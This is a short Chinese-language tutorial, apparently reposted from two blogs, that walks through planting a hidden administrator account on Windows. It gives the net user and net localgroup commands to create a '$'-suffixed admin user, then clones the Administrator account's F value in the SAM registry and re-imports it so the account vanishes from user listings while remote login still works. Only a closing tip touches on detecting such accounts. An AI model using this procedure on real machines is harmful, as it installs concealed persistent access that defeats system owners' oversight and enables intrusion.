CMD创建新用户

需要有ADMIN权限的cmd

创建新用户并给该用户添加管理员权限:

(用户名处加了个$在结尾是可以在net user命令下不显示该用户,但是在控制面板内还是能看到的)

net user username$ password /add
net localgroup administrators username$ /add

例如 ednovas为用户名,paswd为密码的新用户就是:

net user ednovas$ paswd /add
net localgroup administrators ednovas$ /add

这两句命令行后应该有返回命令成功完成

修改注册表

找到注册表路径下HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Nameshacker\$(用户名以图例为准,为hacker$)

找到 HKEY_LOCAL_MACHINE\SAM\SAM\ 默认只有system权限才能修改

右键设置权限勾选,重新启动注册表,就能打开后面的路径了。

此时将管理员Administrator类型对应的F值复制到hacker$类型对应的F值

hacker$对应的两个值导出来

合并注册表

命令行将用户删除

net user hacker$ /del

然后再将导出来的reg合并

合并完后net user无法列出此用户,控制面板中的本地用户和组也不存在该用户

远程登陆成功

Tips

针对隐藏用户,可以查看注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\,有时候看不到是因为没有权限,需要分配权限。隐藏用户的登陆记录可以通过查看日志获取。

转载编辑自 https://ey404.github.io/2021/04/03/intranet03/
https://blog.51cto.com/u_163572/2456061